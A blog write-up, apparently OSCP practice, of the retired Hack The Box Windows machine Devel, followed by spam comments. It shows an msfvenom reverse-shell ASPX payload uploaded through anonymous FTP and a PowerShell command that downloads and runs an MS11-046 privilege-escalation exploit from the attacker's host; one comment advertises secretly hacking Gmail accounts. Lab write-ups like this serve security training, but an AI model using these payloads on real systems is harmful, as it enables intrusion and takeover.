OSCP PREPROTİONS – HTB Devel

The Devel machine is a deliberately vulnerable machine with a Windows operating system found among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the port scan, it was found that ports 21/tcp ftp Microsoft ftpd and 80/tcp http Microsoft IIS httpd 7.5 were open.
As a result of the nmap scan, we saw that we can log in with anonymous on the ftp port.
We logged in with anonymous:anonymous credential information.

(here different users have added their own shel as they have solved the machine)

Here we see welcome.png and aspnet_client directories in the ftp file.
Let’s go to welcome.png and take a look.

While scanning in Gobuster, we detected the /aspnet_client directory.

We’ve definitely figured out that he’s getting it from ftp. Let’s try to put the file in ftp with put and go.

Let’s go to this directory.

When we go to the directory, we see the note we wrote in it, let’s try to load and run our shell here.

We create the payload using msfvenom
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.19 LPORT=4747 -o maygun.aspx

We uploaded our aspx file to ftp server

We are running our payload, let’s trigger it via broser

That’s how we got our shell
We have limited authorization on this shell

We use the systeminfo command to get information about the system.

Windows 7 Enterprise Build 7600 os system is used, let’s see if there is a vulnerability related to this.

We found local privilege escalation vulnerabilities

Let’s download it from searchsploit here

Here we can see the compilation from the descriptions in the exploit.
Here we have set up a web server with python and then from a Windows machine

powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.19:8000/MS11-046.exe’, ‘c:\Users\Public\Downloads\MS11-046.exe’)”
We have executed the command

We ran MS11-046.exe where we obtained the nt authority\system user.

This way we got our user and root flags.

Comments

  1. Pingback: OSCP Prep – HTB all Windows Machine – Muhammed AYGÜN

  2. Juleen

    Generally I do not learn post on blogs, however I wish to say
    that this write-up very forced me to check out and do it!
    Your writing style has been surprised me. Thank you, very nice post.

  3. Jeslyn

    I’m really impressed along with your writing skills as well as with the layout on your weblog.
    Is this a paid subject matter or did you customize it your self?
    Either way stay up the nice quality writing, it’s uncommon to
    look a nice weblog like this one these days..

  4. Tahirah

    Hello, i think that i noticed you visited my blog so i
    came to return the prefer?.I am attempting to find issues to improve my web site!I guess its adequate to use
    some of your ideas!!

  5. Latessa

    you’re in reality a excellent webmaster. The site loading pace is amazing.
    It kind of feels that you’re doing any unique trick.
    Moreover, The contents are masterpiece. you have performed a fantastic job
    on this topic!

  6. ecommerce

    Wow, wonderful weblog layout! How lengthy have you ever been running a
    blog for? you made running a blog glance easy.
    The overall look of your site is magnificent, let alone the content material!

    You can see similar here dobry sklep

  7. dobry sklep

    you are actually a excellent webmaster. The site
    loading pace is incredible. It sort of feels that you’re doing any unique trick.
    Also, The contents are masterwork. you’ve done a excellent task in this matter!

    I saw similar here: Sklep online

  8. dobry sklep

    Good day! Do you know if they make any plugins to assist with Search Engine
    Optimization? I’m trying to get my blog to rank for some targeted keywords but I’m not
    seeing very good gains. If you know of any please share.
    Kudos! You can read similar art here: Dobry sklep

  9. Phone Tracker Free

    It is very difficult to read other people’s e-mails on the computer without knowing the password. But even though Gmail has high security, people know how to secretly hack into Gmail account. We will share some articles about cracking Gmail, hacking any Gmail account secretly without knowing a word.

  10. GSA List

    Howdy! Do you know if they make any plugins to assist with Search Engine Optimization? I’m trying to get my blog to rank for some targeted
    keywords but I’m not seeing very good success. If you know of any please share.
    Appreciate it! I saw similar article here: Scrapebox AA List

  11. AA List

    Good day! Do you know if they make any plugins to help with Search Engine
    Optimization? I’m trying to get my website to rank for some targeted keywords but I’m not
    seeing very good results. If you know of any please share.
    Kudos! You can read similar art here: Hitman.agency

  12. tlover tonet

    Hiya, I’m really glad I’ve found this information. Today bloggers publish only about gossips and internet and this is actually frustrating. A good web site with exciting content, that is what I need. Thanks for keeping this web site, I will be visiting it. Do you do newsletters? Can not find it.

  13. Renew reviews

    I like this post, enjoyed this one appreciate it for putting up. “No trumpets sound when the important decisions of our life are made. Destiny is made known silently.” by Agnes de Mille.

  14. achat cbd

    Thanks for the sensible critique. Me and my neighbor were just preparing to do a little research on this. We got a grab a book from our local library but I think I learned more from this post. I am very glad to see such great information being shared freely out there.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir